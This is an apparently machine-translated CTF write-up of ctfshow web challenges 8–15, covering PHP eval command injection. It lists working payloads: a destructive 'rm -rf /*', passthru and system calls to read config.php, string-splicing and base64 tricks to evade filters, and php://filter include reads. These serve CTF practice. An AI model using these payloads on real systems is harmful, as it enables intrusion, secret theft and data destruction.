Ctfshow Web Learning Records

Mengxin plan

web8:

It was only after some inquiry that the question was found to be a stumbling block , Programmers delete libraries and run away , So this question is just an order ,payload：

?flag=rm -rf /*

Get smoothly flag

web9：

  This question is actually for us to use if Function query in condition config.php In the document flag Can

structure payload：

?c=hightlight_file("config.php");

But it is worth noting that this statement must be followed by ;

After inquiry, the reason is eveal function

Interested friends can take a look at the following article

ctfshow The record of Mengxin's project | su29029 The blog of

Here is a Sao operation , Direct structure payload：

?c=echo $flag;

  This is because we know in advance flag stay config.php In file

web10：

It looks the same as the above question , But use the above payload It's not going to work when it's time , Because this place is really filtered , But the above operation can still be used ：

payload：

?c=echo $flag;

  You can also try to use other functions or string splicing

• Here we use passthru('cat config.php');
• You can also use variables to splice + Function dynamic execution $a='sys';$b='tem';$c=$a.$b;$c('cat config.php');

web11：

Here we construct payload：( Notice that we use double quotation marks inside )

?c=$a=%27ca%27;$b=%27t%27;$c=$a.$b;passthru("$c%20config.php");

  as a result of ：

stay php The processing of single quotation mark string and double quotation mark string in language is different . The contents of the double quote string can be interpreted and replaced , The contents of a single quotation mark string are always regarded as ordinary characters

And then you get flag You need to view the source code to see it

web12:

This question filters config, So we have to try other ways

We can try to use encoding to bypass , structure payload:

?c=$a=base64_decode('c3lzdGVt');$b=base64_decode('Y2F0IGNvbmZpZy5waHA=');$a($b);

  obtain flag：

  Of course, the Sao operation can still be used

web13：

The operation above this question can still be used to kill , But we can still consider ways to bypass ：

stay Linux in ,``  The function is to give priority to the implementation of the contents , Then pass the contents inside to the sentences outside , So we can construct payload：

?c=passthru("ca''t `ls`")?>

  obtain flag：

web14：

  This time it was found that more , But don't panic , Baidu wave , We can also construct ：

Baidu payload【include Contains a binding pseudo protocol 】

include( The file contains a vulnerability ,php Fake protocol ) - 2hangG3 - Blog Garden
?c=include$_GET['a']?>&a=php://filter/read=convert.base64-encode/resource=config.php
Explain base64 that will do
perhaps
?c=echo `$_REQUEST[a]`?>&a=cat config.php

?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=config.php

  Get a bunch of base64 code , Then we decode it

Succeed in getting flag

web15:

This question filters file, But it doesn't affect our structure payload：

?c=include $_GET[a];&a=php://filter/read=convert.base64-encode/resource=config.php

  obtain ：

Decode to get flag：

  These questions are all about the execution of orders , The difficulty goes up （ Of course, it is very simple for the previous operations ）, I think what is worth studying here is the last include Include pseudo protocol , I think this operation is worth studying in depth .